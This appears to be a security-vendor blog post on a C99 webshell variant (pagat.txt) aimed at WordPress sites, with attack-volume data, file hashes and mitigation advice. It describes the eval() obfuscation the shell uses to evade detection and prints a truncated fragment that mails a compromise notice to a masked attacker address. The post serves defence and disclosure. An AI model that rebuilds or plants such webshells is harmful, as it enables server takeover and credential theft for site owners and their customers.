IBM Security is always looking for high-volume anomalies that might signify a new attack trend. One example is webshells, which are scripts (such as PHP, ASPX, etc.) that perform as a control panel graphical user interface (GUI). An attacker could utilize a webshell to gain system-level access to a vulnerable server.

Over the past two months, IBM Managed Security Services (MSS) has noticed a steep increase in attackers’ attempts to push a variant of the popular C99 webshell.

Although we see many attempts to push malicious PHP code on a daily basis, the increased volume of this particular webshell is startling compared to other types of webshell activity IBM MSS tracks: a 45 percent increase from February through March.

According to VirusTotal, relatively few antivirus vendors are catching this variant. What’s more, it’s targeting vulnerable WordPress systems, becoming yet another threat to content management systems (CMS).

Webshells in a Nutshell

Webshells can be used legitimately by a system administrator to perform actions on the server, such as creating a user, reading system logs and restarting a service. Unlike a reverse shell, which requires a secondary program such as Netcat to be run on a victim’s machine, webshells require no communications socket and are simply run over HTTP. They are basically backdoors that run from the browser.

Webshells are considered post-exploitation tools. Before the webshell can be used in an attack, a vulnerability must be found on a target Web application. One way to accomplish this is by first uploading the webshell through a file upload page (e.g., a submission form on a company website) and then using a Local File Include (LFI) weakness in the application to include the webshell in one of the pages.

The Request

Let’s begin with what we are seeing: There is one common URL and file name, pagat.txt, that contains an obfuscated PHP script. Attackers will purposely hide their malicious code in an effort to evade detection and assist in bypassing a Web application firewall (WAF) that may be protecting the website.

The following GET request is issued for this particular variant: hxxp://www.victim.com/wp-content/themes/twentythirteen/pagat.txt. The abbreviation “wp” in the request stands for WordPress.

The text file pagat.txt contains the obfuscated code below, which has been purposely truncated in this example for security reasons.

This obfuscated PHP code would be passed to the eval() function only after it is deobfuscated using one of these three methods:

• Gzinflate inflates a deflated string. This function takes data compressed by gzdeflate() and returns the original uncompressed data.
• Rot13 is a simple letter-substitution cipher that replaces a character with whatever comes 13 letters after it in the alphabet.
• Base64 features binary-to-text encoding schemes that represent binary data in an ASCII string format by translating it into radix-64.

Any of these three obfuscation methods can be used to decipher obfuscated code by simply using an online PHP decoding tool.

The Mechanism

The PHP module on the victim server will decode the obfuscated strings and execute the script. Once decoded, the script shows its intent. The examples below are purposely truncated for security reasons.

First, an email is sent to XXXXX@gmail.com (actual email obfuscated) confirming the target has been compromised:

mail(“XXXXX@gmail.com“, “$body”, “Hasil Bajakan hxxp://$web$inj

Next, the script creates a form page on the victim’s website:

Next, the attacker will call the new form from the browser. This will enable the attacker to execute shell commands on the server as well as push additional files that can be used for other nefarious actions.

WordPress Content Management Systems at Risk

What is very clear is that this particular variant of the C99 webshell is focusing on WordPress CMS vulnerabilities. Our data showed a distinct upward trend in alert volume tied specifically to this C99 variant. IBM MSS detected almost 1,000 attacks utilizing this specific webshell code beginning in February 2016.

Most of the time, these webshell entry points result from vulnerabilities in third-party plugins (which we know often don’t undergo any security review during development) or an unpatched bug in the parent application. In fact, according to IBM X-Force, the largest percentage of CMS vulnerabilities are found in plugins or modules written by third parties.

This specific variant is one of many being used by a mass Web defacer known as Hmei7, who reportedly defaced more than 5,000 WordPress websites over a two-day period. Hmei7 uses backdoors with a file uploading feature and changes critical site files like index.php or configuration.php, which are essentially the keys to controlling the kingdom. Hmei7 is known to have defaced more than 154,000 websites and is currently being tracked by Zone-H.

Read the research report: Understanding the risks of content management systems

Identification

As of April 12, 2016, a Google search for the file name pagat.txt returned more than 32,000 results. Only nine of 68 antivirus products identify this malicious php script, according to VirusTotal. Below is more information about the script:

• MD5: 6b58157d69de0fc2663a0765e1d9c5b5
• SHA1: 0a027b75243f8e6230991c8e58520c7e7799c5cf
• SHA256: c0134d499451bff03335523c9f435f5bce408401d0a042881838d4f309cf8844
• ssdeep24: FMojOrnQLqFlTuOnAtau89M+2XUSMrL1//5ZOcKVrNVkQYfEVhS2/KDZPep30VLg:KGOr6Y0OAgu8SiLtrKTVI6hS2/3p30Vc
• File size: 1.5 KB (1515 bytes)
• File type: PHP

Refer to the associated X-Force Exchange collection for more information.

Mitigation

We brought this issue forward to draw attention to one of the easiest methods for attackers to achieve unauthorized access to your network. Prevention goes a long way to limiting the risk exposure. The following recommendations can help mitigate the latest variant of the C99 webshell:

• Edit your php.ini file to disallow base64_decode functionality. Find the line that states disable_functions = and change it to disable_functions = eval, base64_decode, gzinflate.
• Change the name of your uploads folder. WordPress allows write access to this folder through the media uploader, which makes it easier for attackers to upload PHP files that contain shell scripts. If you leave this folder as the default, an attacker with limited knowledge can guess the file path.
• Install a good security plugin such as the Wordfence WordPress plugin.
• Change all WordPress defaults to customize your install as much as possible.
• If your website becomes compromised, anything that requires validation — such as SSL, FTP, SQL, router/firewall CLI, etc. — is also compromised, including your customers’ credentials. You must change all your passwords and advise your customers to do so the same.
• Scan all files during attachment uploading with ModSecurity. Attackers can take advantage of your excluded content to hide their code. It is no longer feasible to exclude certain file types such as .jpg and .gif since they have been known to contain malicious PHP code within the image headers.
• Use a CMS security scanner such as Acunetix Vulnerability Scanner or WordPress Security Scanner to test for vulnerabilities in a WordPress installation.

Additional recommendations can be found in the IBM X-Force research report “Understanding the Risks of Content Management Systems.”